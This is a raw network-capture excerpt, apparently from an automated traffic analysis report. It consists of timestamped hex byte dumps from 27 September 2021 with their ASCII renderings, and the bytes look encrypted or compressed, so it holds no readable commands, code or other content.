                                    Data Ascii: `K^}|v!rd2^TE#*yVYsT'8GewZ~|R8#"-ZP%CG1:4FW~[V!WCQ'(?qRqx"GvQ~E*-RBi1#U?+sf{?RJeG\!V3
                                    2021-09-27 16:40:46 UTC32INData Raw: f4 6f d2 76 98 c8 f6 fe 47 c4 b7 aa 81 88 be cd 9a 43 f0 39 68 84 b6 87 5e 9d f8 3a e6 ab 17 dc 39 eb e4 f7 39 c4 f0 14 5b f0 f2 30 fb 54 d2 b7 ec b3 6e 01 bd 36 1b 85 6d e7 bb f3 bc 69 e8 70 bf 7c 09 da cf a1 4d f8 e4 a1 60 90 26 12 6c af 89 67 3d e1 3d 4d 34 db 91 9d ad 92 ed c2 7e ff 19 a6 5d 94 81 7a 41 38 2c 81 74 e0 32 cd 48 6b f5 ee 65 82 2c 35 94 58 95 9d 1f ba 86 66 74 60 9d a1 36 13 3a 71 c6 65 fc f3 8b b1 fb 76 a6 45 e1 fa 5c 0b 75 80 fe 0b 18 27 6b 99 c0 cf 06 8e f4 16 97 ce 34 53 a2 df ef 8d 15 42 09 b8 4b 30 8e ca f7 01 53 f7 e7 9f b5 b2 f3 1a f0 d6 5f b6 c5 4a d7 e7 ec b3 7c 01 14 6f 7f 7f 97 ae e2 38 ed cf 1f 70 91 66 ab 99 bf 10 d4 65 0c ba 23 ee f4 1b c3 63 1e 21 4a 93 11 13 99 4a b4 58 95 6f f7 1d b9 9c 71 29 48 e6 96 3c 29 a0 2b c4 ea
                                    Data Ascii: ovGC9h^:99[0Tn6mip|M`&lg==M4~]zA8,t2Hke,5Xft`6:qevE\u'k4SBK0S_J|o8pfe#c!JJXoq)H<)+
                                    2021-09-27 16:40:46 UTC33INData Raw: 15 8f ec da ce 3a e3 13 9d c7 01 64 6f 35 33 0a 0c a2 1e 05 0c dc 50 f6 be d2 55 1d 48 ae ba 79 b2 4b 68 0b 69 ac 5f b3 aa 82 de d7 f7 5e bf 13 1a ca 52 12 1c 9f df 34 7a 5b c5 9b 51 50 af f1 0c f4 bd f5 ac 8a a7 42 22 ea 13 05 fe c1 5e a2 b1 3d 81 12 49 cc b8 8e 61 c9 1a e1 a9 f9 3f a5 dd 87 22 0d 35 57 88 f7 95 f5 f6 6e 6c 0d c4 6f 94 e2 99 ba fb b2 52 4f 97 c3 37 36 41 a6 6a 5c 89 a3 c5 e8 dd f5 d0 94 26 8b 5b 23 da c1 97 38 c5 65 c2 f6 74 b4 cd 7f 7b ea b5 85 d6 ee 0f 85 4d f3 90 95 69 3d 10 df 74 28 cf 66 a5 74 fe 00 80 83 84 2e 36 46 0d a5 9d 97 0e a4 bf 07 48 5a 4e 73 43 1b 0c 2d e3 a9 88 d0 0d 5c b2 d2 bc ad e5 8b 3d 95 a8 0a a8 8c 58 5c 48 51 d7 bd 9f 48 f7 d3 dc 76 b6 25 e9 f5 e3 24 e4 7d 2d 1f 8d 59 9a da c7 33 99 75 06 aa 24 22 39 36 fe 2d e2
                                    Data Ascii: :do53PUHyKhi_^R4z[QPB"^=Ia?"5WnloRO76Aj\&[#8et{Mi=t(ft.6FHZNsC-\=X\HQHv%$}-Y3u$"96-
                                    2021-09-27 16:40:46 UTC34INData Raw: f7 4a f2 8e 21 07 e3 22 0b d4 e1 e9 2f aa 8b 1e 91 37 54 6b 2b 37 67 35 28 b7 54 3d 8b 9e 48 6c fa 0e d4 20 ee c5 97 5e 06 71 12 89 67 05 f2 02 a9 97 86 bd db 81 a7 a6 0b 04 7a 08 82 90 b7 41 9b 8a 79 63 2a 71 df b1 0c 16 bc a7 af 29 e4 f5 05 fe 5b c2 71 51 a3 bb 33 a0 fe a6 65 f8 bd 0b f9 7b c0 fa 1f 43 f8 5d e2 db b6 14 8f ec b3 c7 22 64 88 41 de 86 bc 41 22 e9 17 ce 3c 3c 2d 34 dd 5a fa 76 d0 dd 08 57 7b ea c1 23 ff 56 1d 6f be 45 2c 35 92 c9 d6 fd 8a b9 21 13 44 e5 85 70 11 68 82 e6 53 d3 0d 48 59 21 22 da fc 33 b6 84 9d a6 54 28 ec 39 1b fc e9 4d 92 b8 3d b7 97 48 cc f1 a8 61 d8 0c 58 ac c1 17 b9 dd 87 22 06 31 4f 77 f4 b9 fc f4 64 da 1b f4 3a 8d f1 9d 7d eb b6 45 b5 96 ef 34 2e 52 a2 6a 4d 8d b9 3b e9 f1 fc a3 01 26 8b 51 e4 c0 d2 93 37 d4 61 de 12
                                    Data Ascii: J!"/7Tk+7g5(T=Hl ^qgzAyc*q)[qQ3e{C]"dAA"<<-4ZvW{#VoE,5!DphSHY!"3T(9M=HaX"1Owd:}E4.RjM;&Q7a
                                    2021-09-27 16:40:46 UTC35INData Raw: cd c6 79 6f 4b 01 ec c4 12 66 3b d0 44 08 34 e4 27 f2 ef 76 54 13 24 89 7b 36 70 f8 dc 28 da 19 f7 e4 eb ed 97 1a b5 ba 53 8f 9b a6 d4 69 ea 3f b4 84 a6 16 47 b0 fa 28 c0 ab 1e da c7 ea ca fa 75 ab a4 70 5b f4 ea 03 e3 43 fa ac ee b3 01 62 43 3d 37 87 7a eb a0 cb a3 97 68 5c bd 57 46 f1 7e aa 73 f3 97 c0 7a a0 2e 1e 29 cd 88 67 37 ec 34 45 32 99 08 b7 af f7 7b e0 7f f5 3f a0 59 f0 c8 81 41 32 35 5a 69 cd 14 cb 27 46 dc d6 6f 93 23 f3 fb 73 fb 66 15 ab 89 a0 17 62 ab a1 3c 1a 3a 2f c7 65 fc 3e 8f 8a fe 19 8c 58 e1 f0 4f 0c 68 87 e6 1a 0e 3a 75 17 77 a1 2a 8f d5 1c 94 39 2e 4e bd b0 8b 8d 0e 78 02 d7 09 31 8e c0 2b df 59 fe c9 b4 bd f7 a6 0e 9f 93 82 be c8 27 db 89 bc b8 56 0b 16 00 2f 62 97 a4 3e 34 80 f8 05 2f 9b 40 93 99 bf 1a 08 65 28 ba 43 91 f4 11 c3
                                    Data Ascii: yoKf;D4'vT${6p(Si?G(up[CbC=7zh\WF~sz.)g74E2{?YA25Zi'Fo#sfb<:/e>XOh:uw*9.Nx1+Y'V/b>4/@e(C
                                    2021-09-27 16:40:46 UTC36INData Raw: f5 05 a4 48 cd 71 48 da ec 2c ad f6 ce 3c e9 b0 60 87 5a c0 f0 06 22 50 6e c7 f9 97 8e a7 91 a1 d7 39 61 b6 49 e7 f7 d2 b9 28 c1 0d db 2f 3f 13 24 48 5a f0 ae ed d9 1a 5f ad 49 9b 06 d7 65 1f 14 e1 56 3d 19 d4 bb d7 f7 5e 91 72 12 44 ef e8 16 cf 71 86 f1 85 d9 9b 57 53 10 ea 04 f2 16 6a b3 9d a6 48 23 c4 01 1b fc e3 93 92 92 3d b6 03 49 cc f1 8e 61 d8 54 aa ad cf 0d a4 dd 86 88 1e 4a 1a 76 f6 bd 82 86 e1 db 11 dc 09 8c f1 97 97 fb b4 3e e4 96 ef 30 06 27 a3 6a 47 a5 2e 3b e9 f7 da a1 e4 5d 8a 51 23 eb b4 8c 24 fc da de 08 7f 18 94 79 6f c6 8c 9c fe 53 17 08 40 73 f1 94 62 3e 2c e9 5e 03 dc 50 04 73 5d 04 22 84 d9 26 22 43 03 24 8a 31 0e a5 b2 0e 56 55 2c 7b 78 17 ee 45 f4 81 2b f8 13 55 94 c9 d1 cb e5 9a 3d a0 71 0b 84 8d d1 28 d8 68 ab a7 93 48 e1 da 26
                                    Data Ascii: HqH,<`Z"Pn9aI(/?$HZ_IeV=^rDqWSjH#=IaTJv>0'jG.;]Q#$yoS@sb>,^Ps]"&"C$1VU,{xE+U=q(hH&
                                    2021-09-27 16:40:46 UTC38INData Raw: 17 49 eb 1d 87 7a ea ab fb a7 95 e9 a2 bf 2a 70 f2 70 bb 67 f8 e4 ba 4b a5 24 24 5a af 89 34 3d e1 2c 65 89 f7 90 b1 a4 fa 0a bc 1d f5 35 b7 77 ad ec 80 47 10 08 5d 78 ce 6a 0a 49 61 db d1 1e 8c 27 eb 90 2e b7 66 1f bb 86 66 72 4f 86 a7 31 76 45 49 c6 6f 2a 2b a1 9b fb 77 b7 59 e1 f8 5c 0d 79 a4 dd 1e 12 2b 71 99 c0 d5 36 8a d5 1a 9d e7 34 0b b8 df fe a4 4a 71 0b be 66 43 b8 cb f7 0b 58 f0 cd f7 b7 98 f7 26 26 9b 5e b0 e7 6b c3 88 b6 9a 3a 08 16 06 06 5a 97 a4 36 5b ff f9 1f 7a 9c 66 d4 9a bf 1c 22 dc 24 ba 24 d6 d7 1b c3 69 32 69 5f 89 17 37 a7 4a b4 53 e1 65 f3 1d 62 9a 59 60 0e e6 90 05 92 a7 50 23 c2 ac 38 be 28 26 57 b8 4e 9c 48 1d b2 fd 64 2e 23 b9 9e 3a cc d1 9d f4 cf 50 af 7f b5 fd 2e eb fd e2 ea aa 09 d2 5a 0b 7c 33 20 d4 1d e4 64 76 c6 41 78 32
                                    Data Ascii: Iz*ppgK$$Z4=,e5wG]xjIa'.ffrO1vEIo*+wY\y+q64JqfCX&&^k:Z6[zf"$$i2i_7JSebY`P#8(&WNHd.#:P.Z|3 dvAx2
                                    2021-09-27 16:40:46 UTC39INData Raw: c1 08 ef 69 ac ed 51 fb 17 49 59 2b 55 de e1 20 47 84 8c a3 5a d6 ed 15 12 8f 55 4d 92 b2 37 ae 00 4c cc e0 8b 7e d1 f2 f3 81 c8 06 a0 d4 1d 2e 03 3b 5c 73 f6 a8 f9 e9 1e da 37 f1 6f 80 ef 8e bf ea a7 40 ae 9d 11 35 02 47 a4 62 65 93 ba 3b ef d9 d8 a3 cc 2d e4 9d 29 c1 d8 8c 34 c7 64 de 19 70 86 0a 78 43 c4 b8 bc c9 e1 04 0d 4a e2 95 8b 6e c4 07 db 54 22 d8 b6 0a 6c e4 17 27 84 99 23 3b ac 14 04 a6 91 0c 8d ed 0d 5e 4a fa 5e 54 0c 9a 4b 38 81 2f da 17 45 91 cf be ac fa 97 c7 89 7a 05 8d 96 55 c5 6f 57 d1 42 60 b7 f6 ce cb 73 a7 30 f2 14 ed f6 c1 59 31 93 28 5d 9a da cc c9 93 65 15 ae 0c 27 3c 20 0a 04 fa ed 70 d8 3e bf 74 77 e0 e9 ea df 96 67 1f 40 2d 43 ba 51 3c a3 49 2a 9a ec 62 76 e8 1d 04 8a ba f6 af 76 97 1a 88 bd 2a 91 37 77 a3 d4 d4 89 a5 ef d8 db
                                    Data Ascii: iQIY+U GZUM7L~.;\s7o@5Gbe;-)4dpxCJnT"l'#;^J^TK8/EzUoWB`s0Y1(]e'< p>twg@-CQ<I*bvv*7w
                                    2021-09-27 16:40:46 UTC40INData Raw: 32 31 8e 49 c6 6f fc f3 9a be d3 41 a7 59 eb e9 5b 1f 73 a8 cf 1e 18 21 af 99 c6 e4 06 8e d4 06 9f e7 34 5f ee df 6a 57 0e 63 11 b8 6c 31 95 fa f3 01 6e f7 e5 b2 94 98 f1 1f 9d b5 57 b4 a0 81 c3 88 b6 a4 4f 09 02 2a 06 e9 97 a4 36 1c 82 f9 1f 7a 99 21 0b 99 bf 10 1e 73 0e 28 23 fe fe 74 db 62 1a 2b 56 57 1f 37 b4 4a b4 53 9a 55 da 25 68 9d 7b f7 0d e0 bc 2d 2b a5 51 35 ea 8f 38 be 2c 0e 02 96 4e 94 7a 39 b2 fc 7d 71 1a b8 cf 31 cb f9 8d f7 cf 47 91 d5 b2 c5 6a c2 de e2 ea b1 24 86 a7 0a 56 12 77 68 1d ee 01 46 de 52 77 35 50 6d 80 7e 8c 56 4a b2 20 d1 fd b2 49 3f b0 07 45 60 68 4d 2e 2a e6 6a ae 1d 64 83 40 f7 12 a1 08 3b 76 97 71 7d 54 e4 53 61 70 cd 16 37 2d 14 e6 45 fc 82 db 10 cb bd b4 93 28 ea 2f a6 cc d8 90 37 54 6f 0b 2b 6c 20 2b 9f 77 3b 94 94 9e
                                    Data Ascii: 21IoAY[s!4_jWcl1nWO*6z!s(#tb+VW7JSU%h{-+Q58,Nz9}q1Gj$VwhFRw5Pm~VJ I?E`hM.*jd@;vq}TSap7-E(/7To+l +w;
                                    2021-09-27 16:40:46 UTC41INData Raw: 12 c1 80 ff a3 ca 0f 1c 50 29 cb c3 ba 10 a6 62 de 0e 1a 00 f5 79 65 d3 99 94 ff c0 64 0b 4a f5 b8 03 63 3a 0c e6 75 03 bb 63 07 75 86 9c 23 84 82 37 28 40 3c 00 c7 94 0e a3 9a 99 5f 4c d8 6b 7d 24 e6 27 f4 87 40 48 0c 56 9e de a5 bb cc b2 4e 8b 56 0d ac 10 50 4b d2 79 86 95 e7 4b e9 c6 b7 ee a6 21 fd 1a e8 1a e9 5d 43 86 a5 4e b2 4d cc e3 86 64 2f 83 76 35 39 30 9b 9d d7 ee 6d da 31 ad 4c 5a 84 fa 14 d8 92 f2 35 45 1f e0 6d 86 bf a6 26 ff f5 74 69 5c fc 0e 26 83 a3 da d2 9d 96 1c a0 72 2b 91 2c 64 a2 45 aa 8a a3 e2 c4 f9 23 97 9c e3 2d 11 49 e8 79 4c 92 7a 0f e8 f1 c0 78 e5 1b 9b c1 87 a1 fe e7 1e 45 7e 47 86 d8 da ed 33 3e e4 58 78 ed b2 d4 90 5e 59 3d 13 91 31 e6 cd 51 11 59 06 f7 eb 12 62 2d cb 53 88 91 86 1a fd 80 69 5f cd 34 b0 e9 58 14 f3 ce 20 fb
                                    Data Ascii: P)byedJc:ucu#7(@<_Lk}$'@HVNVPKyK!]CNMd/v590m1LZ5Em&ti\&r+,dE#-IyLzxE~G3>Xx^Y=1QYb-Si_4X
                                    2021-09-27 16:40:46 UTC43INData Raw: 2e 37 73 9a 4e 99 93 a3 09 00 65 37 b0 3d e5 0a 1a ef 6e 0b 29 2f 2d 10 1f 89 59 b3 46 92 4c f8 1d 79 97 6e 3d f3 e7 ba 3c 2d 8d f5 24 ea 85 b4 81 22 0e 1c a8 4b 85 75 2a b8 fd 7f 4b 06 a1 60 31 e7 f0 ee a9 cd 56 87 d9 ad ee 22 c3 cf e8 f5 b2 df 9f 75 1a 7c 33 a1 d5 1d e4 87 73 c7 41 73 26 44 77 8d 93 87 7a 52 80 41 c1 03 b3 7a 27 a5 2a e3 70 6d 5a 5c 97 ca 6f b9 03 7f 8f 54 e4 09 a4 06 3f 97 80 a3 75 40 f5 54 b1 cd d2 19 25 00 00 f7 40 e9 a0 51 10 e7 a6 94 aa 48 e9 25 b3 a6 5a 87 24 54 43 17 3e 78 3a d0 9e 4a 33 9a 9e 48 ec fb 0e d4 5c 73 da 9d 47 1f 76 12 85 69 18 1a 12 82 15 37 fa da 80 a7 a6 09 0a 0a 6e 91 9a bd 44 82 9c 75 95 44 0f d6 89 cf 04 b5 b6 b9 58 a3 ff 05 e5 42 d2 6c a0 d1 c2 21 b1 f1 9d dc e9 b0 6e 23 54 c0 f0 0d 5e 23 70 ca e0 8b 14 9e ec
                                    Data Ascii: .7sNe7=n)/-YFLyn=<-$"Ku*K`1V"u|3sAs&DwzRAz'*pmZ\oT?u@T%@QH%Z$TC>x:J3H\sGvi7nDuDXBl!n#T^#p
                                    2021-09-27 16:40:46 UTC44INData Raw: 9a 39 99 52 23 0f 86 51 41 b7 e6 ae bd 95 27 65 c1 d8 7c 8f 97 f7 0b e4 1b c5 0b a9 85 a5 42 89 dc db f2 8b 1a 8e aa 0c 30 2e ec e7 15 c5 e7 5f 0c 3b bf 65 63 f8 e8 1d f6 db 66 34 43 7a 7b 45 ae c5 b6 2c e8 9d fd 61 74 94 1c 2c 97 e5 78 ae 9e 90 09 83 f4 2c 85 d8 74 9a 6b aa 1a a3 e4 a1 77 0a b9 96 f2 2d 15 9e c1 66 63 b7 6d 22 53 d1 e8 35 f5 32 85 bf 18 b1 f7 c5 6b 57 76 56 33 41 f1 fe 3e 69 0a 5b 78 e7 ab 01 f2 e9 59 3c 3d 96 37 f7 cd 51 ea 59 06 f7 ee 40 73 26 e9 cf 87 83 81 26 c9 fe 7a 73 fb 4d ba 7c 59 12 ea d0 33 df 67 98 8a c3 e5 4b c2 ae bf 6e 82 fd ed 81 69 ec 24 64 9d a7 16 79 b3 fa 24 fb a7 37 49 c4 ea ce 95 14 a9 be 13 5d eb e6 6c f6 42 f8 a6 c8 9d 64 17 45 24 31 59 75 ce 93 cc a7 97 e3 4f b0 7f 33 f1 7e b1 b9 f8 f5 a8 6c 76 37 1b 4b a6 98 77
                                    Data Ascii: 9R#QA'e|B0._;ecf4Cz{E,at,x,tkw-fcm"S52kWvV3A>i[xY<=7QY@s&&zsM|Y3gKni$dy$7I]lBdE$1YuO3~lv7Kw
                                    2021-09-27 16:40:46 UTC45INData Raw: 85 8a 23 9e 5f 0d 6b 16 6b c1 1c ee 01 64 e9 43 72 33 52 60 40 8f a8 52 74 8a 5e db ee bc 7e 0e a3 02 4f af 6d 41 dc 3c 1c 7c b4 01 76 81 56 c9 ff 5a e8 ca 99 87 4a a2 7f ff 43 70 61 c0 97 93 17 72 09 bf 1c 8e 0f 11 e7 ac bd a7 48 e9 2f a0 3d 45 9b 9e 5e 51 1c 34 67 32 2e 9f 4b 3f 4c 6c 61 44 e0 0e de 4e 65 f5 91 54 8b 76 03 8f 43 02 e4 02 b8 0a 35 ea fd 81 a7 ac 1a 13 11 62 7c 91 91 56 90 90 6c 6b 54 27 c2 4f 07 29 b2 be af 77 9d eb 16 f0 48 dc 64 42 2e ef 1f a7 fc a2 be e5 ad 77 ab 7b d1 f4 15 b3 27 43 cc e5 83 9a 38 f1 7a da 3f 77 b7 4f cf 9e d7 a2 dc e8 31 cb 29 3d 07 04 4c 59 f8 ab 4b 7e 46 ce c6 a8 d2 15 d3 61 0c 6b ae a8 3c 31 af e2 62 ec 47 bd 0b 02 40 fd 3a 15 3d 78 82 68 e4 c4 47 5f 8f ac 6d da fc 32 48 9d 8e a2 42 39 e8 2f e5 fd c5 4e 85 ab 39
                                    Data Ascii: #_kkdCr3R`@Rt^~OmA<|vVZJCparH/=E^Q4g2.K?LlaDNeTvC5b|VlkT'O)wHdB.w{'C8z?wO1)=LYK~Fak<1bG@:=xhG_m2HB9/N9
                                    2021-09-27 16:40:46 UTC47INData Raw: 98 9e 96 10 85 cd 12 91 26 7f 55 6d d2 a3 a2 f8 ab 61 22 97 90 f2 3b 21 60 ce 1c 4f 92 7d 27 7f c0 c0 6e b8 32 81 b4 1f a0 ff f6 38 57 76 0c 5c cb f0 a0 38 06 83 28 c2 ed ba 0e d0 58 27 13 3a 85 35 ce d0 7b 65 5e 2e a4 c0 03 64 05 d9 42 86 85 e4 cd f3 ef 76 81 c3 1b b0 49 59 14 f3 d0 0a eb 76 92 ef 35 e7 4d ba 90 b2 7f 8d ba de 81 69 ec 1d 31 8f a1 7f 77 a8 f8 22 ec c4 d9 c6 c7 e0 16 f4 1b 83 89 15 5b f0 e7 2b db 43 f8 a6 3e b3 60 3d 42 2b 37 87 7a eb bd fb bb b5 e9 52 a7 57 0b f0 7e bb 57 f8 f8 ed 7b ae 3e 12 5a ae 92 57 3e e1 61 4d 36 f6 ce b7 af ec 67 78 7e f5 3f b9 59 fd de 81 41 3c 0e 48 7a c8 03 e5 13 62 dd d0 4d 9a 24 eb 92 35 3c 66 1f b0 52 b6 5d 60 9d a1 36 13 1e 61 fe 65 f6 27 55 9b fd 08 97 58 e1 fe 74 1c 7b 80 f1 36 43 28 71 9f e8 d7 04 8e d3
                                    Data Ascii: &Uma";!`O}'n28Wv\8(X':5{e^.dBvIYv5Mi1w"[+C>`=B+7zRW~W{>ZW>aM6gx~?YA<HzbM$5<fR]`6ae'UXt{6C(q
                                    2021-09-27 16:40:46 UTC48INData Raw: 5f 8b e8 93 37 58 30 82 35 67 39 26 b7 38 3d 8b 9e 48 d0 fa 0e d4 67 ea c5 97 5e 3d e3 03 8f 7c 6d 51 12 ae 13 5e 55 73 81 ad bb 75 8a 14 75 88 ff 34 54 88 89 7b 6e 6d 8d dc b1 00 76 31 b7 a6 4c b8 e4 00 dc d3 cd 60 54 f8 41 30 a0 f2 9d f3 e9 b0 6e 87 e7 c0 f0 06 65 b3 6f c7 f9 ee a1 8e e6 aa b8 b4 6c a4 41 d8 e0 5b b8 22 e3 72 53 2e 35 0f 1f d9 52 e1 ad ed 52 1b 5f ad 1c 64 05 d7 67 35 f4 b4 56 37 35 36 c9 d6 fd 5f be 23 22 44 e5 ce 2d c7 68 80 e6 54 a0 10 49 59 27 55 d4 22 27 67 ac aa a6 42 22 ff 36 1d f1 c1 75 92 b8 37 6a a9 49 cc f1 9f 6f f0 a7 f1 ad c7 78 23 dc 87 24 31 33 49 5c e0 a8 f2 9b 68 da 1b f2 6e 57 e2 8a a9 fa 8e c9 b1 96 ef 25 20 43 b2 7d 22 04 b8 3b ef e2 ed b2 c2 36 9b 4b 46 48 d3 93 3e c7 72 cf 06 64 88 ed 16 e6 c3 93 80 c5 fa 06 19 62
                                    Data Ascii: _7X05g9&8=Hg^=|mQ^Usuu4T{nmv1L`TA0neolA["rS.5RR_dg5V756_#"D-hTIY'U"'gB"6u7jIox#$13I\hnW% C}";6KFH>rdb
                                    2021-09-27 16:40:46 UTC49INData Raw: 97 85 9c 1d 6f fe 7a 47 db a2 89 78 40 02 65 cd 24 c9 60 0e f4 ed fc 5d 58 ae b5 63 9f 0e d8 85 74 fc a9 79 8a bf 6f c3 a0 fc 3d e3 bd 83 d7 c1 f5 c2 ec a2 ba b8 0a 50 ec 76 12 e5 5c f4 ba 7c a2 60 08 4e 21 ab 96 7c f4 b5 ed 3b 86 ef 43 b2 41 97 e0 78 b0 14 d5 e5 a1 71 ad 2d 05 35 85 88 67 37 e8 2a 22 1f f7 90 bd a6 fe 13 ad b9 f4 35 b9 53 ab 79 80 41 32 2e 4b 50 75 06 cd 4e 78 50 d1 65 82 27 f8 93 4b fd 70 1d 18 9d bf 6f 5e 26 9e 36 19 13 eb d7 62 ee 2f 05 2c 77 49 a7 59 e0 58 4d 0c 6a 88 e6 16 0c 3f 68 14 ef ce 06 8f c6 1f 8e ee 22 48 24 ce e6 9b 18 ee 1a b1 74 26 12 db fe 29 f0 f7 e5 b8 a5 91 e7 9e b3 b8 4f be d9 d2 eb 99 bc b2 76 db 04 00 2e 65 bf b0 3c 34 cf d0 2b 71 9b 44 e7 8b bf 1a 11 9b 2d ba 22 8a e6 1b c3 78 75 39 5d 89 1b 0c 87 5b b0 4d a6 e1
                                    Data Ascii: ozGx@e$`]Xctyo=Pv\|`N!|;CAxq-5g7*"5SyA2.KPuNxPe'Kpo^&6b/,wIYXMj?h"H$t&)Ov.e<4+qD-"xu9][M
                                    2021-09-27 16:40:46 UTC50INData Raw: 4d 43 ff f9 1e f3 bd 63 3f 98 b7 f3 44 ae d2 a1 0e 6c 9a ec 62 4f fe 0e 24 b9 4b f1 af 98 be d0 89 e5 20 b9 ed 74 8b 67 bb 45 a2 e4 a1 72 24 9e be 6e 27 03 6a e8 10 4d 92 7a 34 78 e1 c7 5f f3 34 84 73 76 a2 fe ed 1e 45 70 47 86 d8 e2 ed 33 3e ab 59 78 ed ab 0c f2 9c 5a 3c 3d ad f0 e5 c7 7f 74 53 2e 00 c3 03 64 3a 4c 1f 86 83 8a 18 e0 fe 6f 49 d2 33 05 6f 4a 7b b0 dd 22 d9 65 9e f4 e7 f1 d1 c8 ae bf 68 13 81 cc f0 9f eb 35 6e 9f a8 68 56 a0 f6 38 70 83 79 c7 c7 e0 a7 0d 3f ab b8 06 56 eb e7 17 cb 80 fb ac e6 a4 eb 10 43 37 36 94 6e fa af ed b1 1b d6 5c bd 56 a9 e0 6a af 73 ec cc 02 7b a0 2e 06 72 6c 8a 67 3b f6 b0 4a 36 f6 91 a4 ba ec 01 d4 69 79 0a b3 5f 82 4c 91 54 2c 32 4b 50 6b 05 cd 42 75 f5 15 66 82 20 fc 19 5d fa 66 1e a9 9a a9 6e 5e bd 2d 09 19 12
                                    Data Ascii: MCc?DlbO$K tgEr$n'jMz4x_4svEpG3>YxZ<=tS.d:LoI3oJ{"eh5nhV8py?VC76n\Vjs{.rlg;J6iy_LT,2KPkBuf ]fn^-
                                    2021-09-27 16:40:46 UTC51INData Raw: 19 87 80 5f 1b a5 ee 52 6b 67 08 0a 20 25 0f e4 45 e3 99 20 0a 19 ad 90 be 63 c1 33 b3 a6 45 81 32 41 49 f8 35 4b 3b 27 85 b0 33 94 93 73 4e fa 1f db 58 88 c4 bb 57 0d 65 06 8f 67 07 fb 18 50 18 1d de 7b 90 a3 92 6f 02 15 75 9d 9c ae 50 88 92 6d 74 4c dd de 9d 0e 03 a2 60 ac 59 ba e6 00 f4 59 c8 79 a0 d1 c2 36 b6 fe af 7b ec b0 75 aa 65 3e f1 20 7f 2e 6d ce e9 ee fb 8f e6 aa c8 23 45 8b 4a cf 85 d0 bf 35 86 f2 da 2f 3f 2d d9 dc 5a fa c9 ed 1a 1a 5f ad 1c 1a 07 d7 6b 35 4b b4 56 37 11 b5 c0 c5 f2 54 a8 0e 0b ba e4 e8 1d 39 46 82 e6 55 df 84 5b 5c 21 57 df e0 cd 43 a8 91 a0 40 47 25 39 1b f6 db e1 8f ab 38 b7 02 4c d1 0f 8f 4d dd 1a f8 b3 d2 12 a4 cc 82 34 e2 30 63 75 e1 aa f9 f4 f1 de 04 f8 87 8c dd 9f 91 ef 8e 43 4e 69 10 3c 04 41 92 6e 4d 53 b8 3b e9 9e
                                    Data Ascii: _Rkg %E c3E2AI5K;'3sNXWegP{ouPmtL`YYy6{ue> .m#EJ5/?-Z_k5KV7T9FU[\!WC@G%98LM40cuCNi<AnMS;
                                    2021-09-27 16:40:46 UTC52INData Raw: 38 00 fd e9 79 ed b0 70 c8 5e 59 27 28 82 20 e0 ef a5 66 58 00 92 71 02 62 27 b5 52 86 83 90 18 fb fd 74 4e c5 b0 2f 69 83 3c ff dc 22 f8 67 95 f4 e3 cf ab c4 bf b5 6c 80 e1 eb 81 69 ec 26 62 9d ab 68 5a 99 24 22 ea ad 70 ee c5 ea ce eb 34 ba b5 7a 7f f8 ea 05 f2 49 e9 a5 8f 95 64 17 45 26 3d af a7 e8 bb fd c8 bd eb 5c bb 89 07 d9 49 bb 67 f2 cc 99 7b a0 2e cc 5a be 84 70 eb f2 30 5c 3b e7 9e 39 18 c2 27 3d 81 0a eb a6 7a ab d9 80 41 32 35 53 0b 72 05 cd 42 6a f5 ee 65 82 2c 35 96 5c d0 61 35 fb c0 b8 78 48 aa a1 36 1f 12 49 c6 7e f6 2d 8b ba fb 76 a7 4d e1 fa 5c 11 79 80 f6 1e 18 2b 71 c6 c0 ce 06 27 d5 16 9f ef 35 5f b8 d3 ef 8c 0e 68 0b b8 6d 30 8e ca f7 07 53 f7 e5 93 b5 98 f1 29 9e 99 5e a3 cf 48 c3 92 bc b2 7d 18 26 03 2e 5d 96 a4 3c 46 c5 f8 0e 66
                                    Data Ascii: 8yp^Y'( fXqb'RtN/i<"gli&bhZ$"p4zIdE&=\Ig{.Zp0\;9'=zA25SrBje,5\a5xH6I~-vM\y+q'5_hm0S)^H}&.]<Ff
                                    2021-09-27 16:40:46 UTC54INData Raw: 82 90 6f 18 ff 23 df bb 0d 2d 8d b6 a6 4c 6e f7 03 de 4f e7 60 5e 91 da 33 a0 f6 b5 68 e9 e6 64 af 7b 8a f1 0c 4d 86 6e c7 f3 97 14 8f e6 a0 d7 33 6d a4 4b cf 8f d5 b9 22 e9 de db 2f 35 cc 0d dd 5a e5 a8 c5 c9 01 5f a7 35 d5 36 d2 61 75 6e b4 56 48 1d aa d8 a5 4d 54 b9 01 19 6c 0b c7 14 17 64 fe da 53 d3 97 40 36 91 47 da f6 3e 4b eb 2c a7 42 22 ff 35 0d ef e2 75 87 b9 3d b7 02 45 dd fa 14 72 dc 05 e3 a9 ae a7 a5 dd 8d 31 19 20 4a 5b f3 64 09 f4 e0 db 0a f1 51 62 f2 9d bc 85 04 44 b1 9c c7 a8 2e 52 a8 79 4b 9c bf 13 66 f0 fc a9 e0 22 56 85 29 c1 d2 82 3d fc 91 dd 08 73 f7 46 78 6f c8 bb 1a d6 e8 1d 1b 40 e2 9a 85 67 12 91 f4 5c 2d a0 d2 06 73 e3 2c be 84 88 2c 33 54 3d 5b b3 97 08 b6 b5 1f 5b 64 23 79 54 0a ff 96 f5 81 25 f8 91 56 94 c5 bc a1 f4 9c 11 6d
                                    Data Ascii: o#-LnO`^3hd{Mn3mK"/5Z_56aunVHMTldS@6G>K,B"5u=Er1 J[dQbD.RyKf"V)=sFxo@g\-s,,3T=[[d#yT%Vm
                                    2021-09-27 16:40:46 UTC55INData Raw: 21 b3 40 14 77 f7 fb 0f cb a7 f8 ac e6 a0 63 08 5a 24 25 87 6b f9 a4 e0 59 96 c5 55 85 c1 0b f1 7e a4 7b eb f6 a1 6a b2 33 ec 5b 83 8a 7f 2e f3 3d 5c 24 e9 86 49 ae d1 1e d3 74 e2 af a0 53 9c f9 93 53 38 37 4d 66 36 04 e1 4f 68 ce d8 7a 8b 35 f9 94 4b e8 79 12 44 8d 94 70 59 a3 b2 27 06 1c 5a d4 65 e7 3f 94 84 05 77 8b 56 f0 ea 4d 1a f7 37 c8 76 19 2b 71 86 e0 dd 14 8e c4 04 80 fb ca 5e 94 c9 fe 86 18 e8 23 07 6e 30 88 dc df 2f 53 f7 ef a4 87 b9 ee 13 8c 8b 5e a7 dd 57 c8 76 bd 9e 77 1a 18 11 23 e4 84 a3 23 38 d6 ea 1f 61 89 51 8d 67 be 36 00 74 36 ad f4 ed e4 04 dc 70 08 21 4d 9b 0e 16 7d 4b 98 5e 98 4c ff 02 62 8e 63 29 1c f4 89 37 d5 a4 7c 2e c2 8e 3c be 24 1d 18 a4 55 89 72 39 a3 ef 77 bf 18 94 97 43 71 f9 d6 fd c5 4c 94 d4 b7 ec 3a dc d0 1c eb 8c 